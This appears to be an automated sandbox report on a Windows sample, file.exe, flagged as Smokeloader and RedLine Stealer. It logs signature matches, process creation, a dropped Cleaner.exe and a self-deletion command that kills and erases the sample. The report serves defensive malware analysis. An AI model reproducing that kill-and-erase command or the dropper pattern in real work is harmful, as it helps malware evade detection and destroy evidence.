                  Source: 00000000.00000000.387732465.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.398529182.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.389024466.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.397514414.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.389435332.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.429950060.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.404645507.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.429384361.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.422448274.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.442925431.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.449688611.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.423616490.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.403954435.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.422077182.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.436080852.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.450901670.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.429267314.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.388203778.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.436745774.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.442728263.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.450741403.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.423688674.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.436219416.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.444122834.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 528
                  Source: file.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: file.exe, 00000000.00000003.487110409.0000000003882000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.489749131.0000000003C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.485888076.000000000388E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.487947725.0000000003A89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.492229793.0000000003CD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.486830335.0000000003C6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.492756485.000000000388C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.486546343.0000000003A7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.490690243.000000000388E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.484088372.0000000003A50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.491474837.0000000003888000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.485359675.0000000003C29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.491876169.0000000003AA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.491018465.0000000003AA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\soft[1] C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                  Source: Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: file.exeReversingLabs: Detection: 47%
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 528
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 708
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 716
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 724
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 776
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 896
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 908
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 1156
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 1228
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe "C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 1292
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2380 -s 1576
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2380 -s 1576
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe "C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe"
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2380 -s 1576
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe
                  Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;file.exe&quot;)
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQSJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfvJump to behavior
                  Source: classification engineClassification label: mal96.troj.winEXE@25/55@1/5
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\System32\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\System32\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2380
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:120:WilError_01
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5464
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: UxTheme.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdbb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: win32u.pdba source: WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptbase.pdb^ source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: gdiplus.pdb$ source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: s\`l\.pdb source: Cleaner.exe, 00000018.00000000.572272911.00000009D2EF5000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: winnsi.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: clr.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb0 source: WerFault.exe, 00000020.00000003.600768010.000001E4306F9000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: advapi32.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: gdi32.pdb8 source: WerFault.exe, 00000020.00000003.621394438.000001E43111A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621252876.000001E43111A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620458409.000001E43111A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdbc source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: WerFault.exe, 00000020.00000003.602123484.000001E43064D000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
